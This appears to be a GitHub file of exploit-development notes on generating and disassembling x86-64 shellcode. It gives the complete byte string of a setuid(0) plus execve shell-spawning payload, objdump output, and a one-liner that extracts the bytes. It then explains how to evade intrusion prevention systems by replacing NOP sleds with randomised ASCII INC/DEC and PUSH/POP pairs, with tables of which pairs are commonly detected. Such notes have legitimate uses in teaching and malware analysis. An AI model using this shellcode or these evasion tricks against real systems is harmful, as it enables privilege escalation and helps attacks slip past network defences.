-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathGenerating shellcode
More file actions
85 lines (70 loc) · 3.75 KB
/
Generating shellcode
File metadata and controls
85 lines (70 loc) · 3.75 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
objdump -d shellcode.o
shellcode.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 ff xor %rdi,%rdi
3: 6a 69 push $0x69
5: 58 pop %rax
6: 0f 05 syscall
8: 57 push %rdi
9: 57 push %rdi
a: 5e pop %rsi
b: 5a pop %rdx
c: 6a 68 push $0x68
e: 48 b8 2f 62 69 6e 2f movabs $0x7361622f6e69622f,%rax
15: 62 61 73
18: 50 push %rax
19: 54 push %rsp
1a: 5f pop %rdi
1b: 6a 3b push $0x3b
1d: 58 pop %rax
1e: 0f 05 syscall
for i in $(objdump -d shellcode.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x54\x5f\x6a\x3b\x58\x0f\x05
##########################################################################################################
Shellcode Disassembly
Many times you may come across shellcode in the wild, for example when analyzing malware or the newest exploit. You may want to disassemble the shellcode to learn what it does, the easiest way to do this is with objdump. In this example we'll use the example code which we just constructed, the shortest 64-bit setuid() shell online:
╭─user@host ~
╰─➤ echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" >
shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode
shellcode: file format binary
Disassembly of section .data:
00000000 <.data>:
0: 48 31 ff xor %rdi,%rdi
3: 6a 69 pushq $0x69
5: 58 pop %rax
6: 0f 05 syscall
8: 57 push %rdi
9: 57 push %rdi
a: 5e pop %rsi
b: 5a pop %rdx
c: 48 bf 6a 2f 62 69 6e movabs $0x68732f6e69622f6a,%rdi
13: 2f 73 68
16: 48 c1 ef 08 shr $0x8,%rdi
1a: 57 push %rdi
1b: 54 push %rsp
1c: 5f pop %rdi
1d: 6a 3b pushq $0x3b
1f: 58 pop %rax
20: 0f 05 syscall
Most modern day IPS systems are capable of recognizing ASCII NOP sleds due to their popularity in modern exploitation. Many IPS systems look for large strings of repeating characters. The solution to this problem is to make use of 'effective NOPs', instead of simply NOPs. Combine this with a randomization sequence and one can avoid IPS detection in a few simple steps.
ASCII NOP Pairs (Figure 1) ASCII Pair Hex Opcode Register Instructions Used Commonly Detected
AI \x41\x49 %ecx INC, DEC No
@H \x40\x48 %eax INC, DEC Yes
BJ \x42\x4A %edx INC, DEC No
CK \x43\x4B %ebx INC, DEC No
DL \x44\x4C %esp INC, DEC No
EM \x45\x4D %ebp INC, DEC No
FN \x46\x4E %esi INC, DEC No
GO \x47\x4F %edi INC, DEC No
The Pair can be put in any order, e.g. AI, IA, @H, H@, as long as both characters are used the same number of times. They can even be jumbled together. The above is only true when using INC and DEC NOPs exclusively.
ASCII NOP Pairs (Figure 2) ASCII Pair Hex Opcode Register Instructions Used Commonly Detected
PX \x50\x58 %eax PUSH, POP No
QY \x51\x59 %ecx PUSH, POP No
RZ \x52\x5A %edx PUSH, POP No
S[ \x53\x5B %ebx PUSH, POP Yes
T\ \x54\x5C %esp PUSH, POP Yes
U] \x55\x5D %ebp PUSH, POP Yes
V^ \x56\x5E %esi PUSH, POP Yes
W_ \x57\x5F %edi PUSH, POP Yes
a` \x61\x60 ALL PUSH, POP Yes